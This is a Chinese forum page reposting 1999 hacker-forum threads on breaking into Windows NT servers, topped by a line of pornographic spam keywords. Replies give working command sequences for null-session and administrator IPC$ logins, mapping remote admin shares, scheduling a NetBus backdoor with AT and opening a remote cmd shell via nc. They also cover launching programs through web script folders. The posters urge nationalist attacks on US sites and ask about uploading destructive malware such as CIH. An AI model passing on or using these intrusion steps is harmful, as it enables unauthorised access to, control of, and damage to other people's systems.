久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖
汶上信息港
標(biāo)題:
關(guān)于“怎樣進(jìn)入NT主機”的幾點補充
[打印本頁]
作者:
雜七雜八
時間:
2011-1-13 17:03
標(biāo)題:
關(guān)于“怎樣進(jìn)入NT主機”的幾點補充
《版主頁黑客工具和文章的幾個問題》中提到:
+ K% I. Z- Z. K; R6 Y2 T
請教,從版主頁上載得PINGER,GRINDER,LETMEIN等,卻不能用,PINGER安裝后,明明安裝前文件有1M多,但安裝完后生成的文件夾中只有PINGER。EXE,40多K,運行PINGER,設(shè)置好IP,點PING,彈出一個窗口(C++。。。),說出錯,然后關(guān)閉了,何故,是不是安裝有誤? 2。運行LETMEIN,彈出以下錯誤:連接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否說明需要NETAPI32。DLL文件,哪里有該DLL。 3。USAKILLER 的教學(xué)文章中提到需在WINNT4。0下運行以下步驟等,是否要求我的操作系統(tǒng)也是WINNT4。0 ,應(yīng)該不是吧? 4。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務(wù)器的操作系統(tǒng)為NT? 太多的問題需高手回答,我花那么多的時間和金錢下載這幾M文件卻不能用,實在窩囊哦, 強烈建議USAKILLER 等高手級的黑客寫更多的教學(xué)文章,以提高我國黑客水平。
2 s u* @* o. i. |+ u+ d6 {
> 我的機子MMX166,WIN98,2。5G,32M內(nèi)存。
& G# F" a8 [. a7 e7 e
2 I4 D2 S/ B: _; h
黑客并不神秘,你只要了解操作系統(tǒng),學(xué)習(xí)一些操作系統(tǒng)的弱點,輔助相關(guān)的工具,就可以成功。
( m0 G& k1 m3 ?8 p6 Z. Y
你的問題是,pinger, grinder, letmein等工具必須要在NT上運行,我們強烈建議,你一定要安裝NT,對于你的機器配制,和我們現(xiàn)在差不多,只是比你多了32M內(nèi)存,2G硬盤。
" E$ D* g" h4 K3 G
其實,攻擊敵站,利用其操作系統(tǒng)本身的工具就可以了,比如,我們在NT上攻擊某服務(wù)器,該服務(wù)器為NT4.0,我們將做如下簡單事情就有可能成功,假設(shè)目標(biāo)NT的IP地址為111.111.111.111,做法如下:
$ F v( L5 X7 A; W' n: n2 g4 P
net use \\111.111.111.111\ipc$ "" /user:""
+ y+ d: Q( y) a' W, h6 I
net.exe是NT的工具文件,該命令將和目標(biāo)服務(wù)器建立Null Session,如果成功,你可以查看該服務(wù)器上的共享目錄:
u- k7 m; s. B6 ~" Z
net view \\111.111.111.111
: C+ f2 S1 L; b. t
當(dāng)然,如果你有該NT管理員密碼,就更好辦了,假設(shè)其管理員Admin密碼為fuck:
1 O; c" @6 P- z3 d9 T- _
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
) _2 l8 D& v. y6 b
命令成功后,幾乎所有目標(biāo)NT上的配制,資源,你都可以在你本地NT上連接遠(yuǎn)程計算機來查看或修改:
: W2 E! v. O: y! W" k3 a
1、查看或修改遠(yuǎn)程機器上的硬盤,假如目標(biāo)NT上有C、D兩個硬盤:
& { f* J1 C/ z8 ?1 e
net use x: \\111.111.111.111\c$
+ d9 l0 K# w- |
net use y: \\111.111.111.111\d$
' K5 b5 w% T2 z1 X. N% h: G
這樣,目標(biāo)NT上的C、D盤分別被影射為你本地的X、Y盤,你想怎么做都可以...
. K, I7 x9 `7 x. [/ z; _6 G2 t
2、管理目標(biāo)NT的用戶:
! k A; [$ g& L* b H
從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
, r+ l+ @2 N$ j5 J5 F
鍵入\\111.111.111.111后,目標(biāo)NT上的所有用戶你想怎么做都可以,和管理你本地的一樣
" f7 Z; C, F- a1 ]
3、管理目標(biāo)NT的服務(wù)
) B" b0 [5 O3 R4 C% l+ x4 h
選擇“管理工具(公用)”->“服務(wù)器管理”->“計算機”->“選擇域”
' S0 @1 ~6 d R, m$ X
這樣你可以管理目標(biāo)NT上的服務(wù),共享目錄
6 W% P6 o- q" g5 `
4、IIS管理
- T; W1 A: @- F$ f% H
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
2 @8 t% |3 e! n
目標(biāo)NT的FTP、WWW服務(wù)你就可以重新配置
; }9 ~& O9 \! ]2 g
5、事件管理
- W& h( U& l; c
“事件查看器”->連接到服務(wù)器->111.111.111.111
" u) N5 z5 f5 V7 `1 [; e
; D( l; M0 V' w8 I- }5 n" _
還有更多的東西,都可以用NT本身的功能來完成,這些都是95, 98所不能實現(xiàn)的。
e g0 D1 D v# r( n l
, M5 T4 p) E1 g# F/ J! C; p+ j
當(dāng)然,98,95也能做一些事情,但很麻煩,比如:
9 a* y- Q. S$ F" e5 E# h6 L' w
net use \\111.111.111.111\ipc$
" @4 ^ m# H( s. y2 ~4 b
net use z: \\111.111.111.111\d$
- ]. V2 f3 M$ g* {3 J
但其后不能帶參數(shù),即改用其他用戶或密碼,系統(tǒng)將用當(dāng)前用戶和密碼去登錄,如果你知道目標(biāo)NT的用戶或密碼,重新啟動95, 98,改用該用戶和密碼登錄,方可實現(xiàn),你可以連接目標(biāo)NT上的共享資源,但不能進(jìn)行管理,如用戶、事件等
3 ~5 f% T# j3 }# {
. J' V( k3 M# p1 a# y
我們強烈建議各位有心要為死難者報仇,真正的想黑霉國的站點,花點時間,裝個NT吧,NT Workstation也可以!
% i: p2 V" N, w& a# u' F3 k- h4 I
這樣,你還可以了解目標(biāo)機器上能有什么東東供你去用!
5 O$ @" X Q6 S0 Z0 i
3 O: f6 R7 M* _; i
" C* Z# K& A$ s+ N" j' m" C; m
--------------------------------------------------------------------------------
8 x7 m- o5 a9 d& h+ D+ \+ G7 |7 U
# v8 u8 h: |4 o7 h/ E" w
>quack于1999-06-12,23:37:44
: a9 L+ m. v! e# f9 h8 w+ k
在大作《幾個有關(guān)黑的問題》中提到:
. C, L9 J( p/ M; r$ B
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機的東東上去,而未傳NETBUS,可否直接在其機了運行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機子,但運行程序時卻是在我的機上干活,差點把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!。
) t0 l' c% ]; ]9 b% @7 e/ o, J
/ e. n( E8 t) K+ E% J1 k
killusa于1999-06-13,03:25:15
& Z) X+ }8 \/ \1 Q/ S
在大作《Re: 幾個有關(guān)黑的問題》中提到:
; a8 M! G* N7 o5 l
; @% t, B7 ?$ R8 h5 `
letmein.exe 暫時沒有mypwd參數(shù),十分抱歉
; P% s! s8 z3 a% ^9 L! ^
pinger程序,只是利用ping來尋找主機,每臺NT服務(wù)器有一個主IP地址,但也可以設(shè)置多個輔助IP地址,比如有些服務(wù)器供應(yīng)商,一臺NT服務(wù)器上可以設(shè)置一千多個IP,每個IP對應(yīng)一個Hostname,而真正能找到主機名的只有一個IP地址,就是該主機的主IP地址,所以有時顯示只有IP,而無主機名。另外,有些服務(wù)器是非NT的操作系統(tǒng),有時將不會顯示主機名。當(dāng)然,有時在服務(wù)器上進(jìn)行一些設(shè)置,也會出現(xiàn)上面的情況。
, q" y3 n' o& O6 {$ H6 }
0 q; @3 u u8 \4 r
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個程序,所以,netbus.exe是不用上傳的,只需在目的
% _3 ?# s ~; X5 B; W% `+ T' u, U9 d' r
服務(wù)器上運行ntsrv.exe,而在目的服務(wù)器運行該程序有很多種方法:
+ |3 J6 {2 x y1 T9 q
) ~: q4 Y( X# s' M; w2 M) o+ p
1、利用服務(wù)器的 Schedule 服務(wù)來啟動schedule 服務(wù)是指在服務(wù)器上定時運行某程序,具體使用方法,可在自己的NT Dos窗口下鍵入以下:
* p$ D9 ]4 J# {( R; L' h' d
! w1 |, K% N/ q" r3 r F3 Y9 b
C:\>net start schedule
7 V3 M" j0 }( a0 X1 Y
Schedule 正在啟動服務(wù).....
1 [1 \6 l4 m6 B
Schedulw 服務(wù)啟動成功。
9 O3 O( {% b' I6 L+ v
C:\>at /?
" H. i; _0 K$ L# e; J
AT 命令排定在特定的日期和時間運行某些命令和程序。
; a; \; k% g$ s* f8 p6 s; H" X: k
運行 AT 命令之前必須先啟動 Schedule 服務(wù)。
. f9 ?' V9 B2 S! B6 I3 w3 V
: j. g0 R9 ~& u( g+ Q
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
1 R! W+ Y% I+ g7 v. y' C5 u* w1 N
AT [\\computername] time [/INTERACTIVE]
5 i$ W' `0 D. E7 b
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
; M4 @+ l0 e9 H. ]+ ]
! w& m2 w( Y: J
\\computername 指定遠(yuǎn)程計算機。 如果省略這個參數(shù)
% q6 j/ X: r5 ~! U0 h& w( s
命令會被排定在本機上運行。
4 C S& z: `6 H: h4 d4 U
id 指定給排定進(jìn)度命令的識別號。
) }0 h: A+ K _2 z T- r
g( p+ `7 L- W, M
/delete 刪除某個已排定進(jìn)度的命令。如果省略標(biāo)識,計算機上所有已排定進(jìn)度的命令都會被刪除。
5 u/ ]$ ^) {1 P0 @: R
/yes 用于刪除所有作業(yè),且不想在運行刪除時顯示確認(rèn)信息 。
9 v3 l2 {+ z6 i1 P8 @" t; F
time 指定命令運行的時間。
/ f: J8 I$ U1 h! c& z; T
/interactive 允許作業(yè)在運行時,與用戶通過桌面交互。
) d5 G3 ^! x3 n( @# u+ T! E$ F
4 s m! }# m& _
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令。
' |( ~5 q' T, V( e! s6 Z; l% h
如果省略日期,則默認(rèn)為在每月的本日運行。
) o9 F7 u9 W5 F! q! t
& Z$ i% t0 U r9 C4 T8 Z0 o+ Y8 Z* A
/next:date[,...] 指定在下一個指定日期 (如,下周三),運行命令。如果省略日期,則默認(rèn)為在每月的本日運行。
; w R, s1 D4 R' R9 n e# k
/ X% C `0 c* v2 ~
"command" 準(zhǔn)備運行的 Windows NT 命令或批處理文件。
/ J$ ^+ A+ f' f1 R3 E3 k
2 }$ o4 Z# r2 z# M
C:\>
0 y% H/ F+ n1 q5 X1 m! Q$ h. U- i
: J2 U0 M* E0 Q6 P7 |' n
知道了如何使用AT,再來看看如何在遠(yuǎn)程NT上運行ntsrv.exe:
; @- E6 @% Q, p8 w& f& g5 M. {
1 利用管理員登陸到目的服務(wù)器,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
2 j8 k' k& h" P! S& K
2 利用ntsrv.exe啟動遠(yuǎn)程: netsvc \\x.x.x.x schedule /start
2 E* H) p5 T- f S& v9 L; _* z
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時運行,當(dāng)然最快運行最理想,所以,你可以用letmein.exe得到服務(wù)器的時間,然后:
" C. i+ B* q8 X) ~
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
8 ]5 A: C0 C% o# _% O
其中00:00要改為用letmein.exe得回來的具體時間+一點容量,等一會后,再在本地啟動netbus.exe,鍵入目的服務(wù)器得ip地址或hostname,連接!具體使用可參照 "How to get in nt",比如第一種方法,你想要在目的服務(wù)器運行 LEGION,可以利用netbus得上傳功能,將LEGION上傳至目的服務(wù)器,再用netbus的"Start program",鍵入完整路徑的LEGION運行程序,就ok了!第二種方法是利用netbus的“App redirect”功能,啟動遠(yuǎn)程telnet服務(wù),如下:在netbus中擊“App redirect”,鍵入"C:\>winnt\system32\cmd.exe",Port為:4321,服務(wù)就啟動了,然后在本地運行:nc x.x.x.x 4321,出現(xiàn)dos啟動的畫面就表示連接成功:
% U- x8 d z& L- |: M
Microsoft(R) Windows NT(TM)
6 y- `+ `1 t [8 b- F. w
(C) Copyright 1985-1996 Microsoft Corp.
, e6 Y2 C# m1 }
C:\>
0 p' D3 j' f+ g$ r3 E2 |5 l
6 ~" V/ N: p+ z1 o% v
2、利用web啟動ntsrv.exe或其他程序在目的服務(wù)器
- b m! ] t5 |+ \) }9 `, _
1 i7 C* E6 ~" j
將ntsrv.exe 或其他運行程序Copy到目的服務(wù)器的www可執(zhí)行目錄,如cgi-bin或scripts,然后在瀏覽器鍵入url如:
+ x9 k0 Q5 { n6 [
http://x.x.x.x/scripts/ntsrv.exe
/port:64321
6 v0 a/ }/ c5 J# A( h/ H6 S& D7 l
或
http://x.x.x.x/cgi-gin/ntsrv.exe
/port:64321
# f5 M7 a" s% K% @- ]/ f1 V
該程序就啟動了
9 F+ y- k& x# |3 J! J+ {$ h- [
9 |( `2 |' B3 O9 b9 B
我只提這幾中方法!
3 B9 L% I' D+ S `- U
要成功,必須打好基礎(chǔ)工,對操作系統(tǒng)充分了解!
: m0 l( i, Z: e% D2 {( P/ A
: l3 F8 q" A1 R+ W
歡迎光臨 汶上信息港 (http://www.junkejituan.com/)
Powered by Discuz! X3.5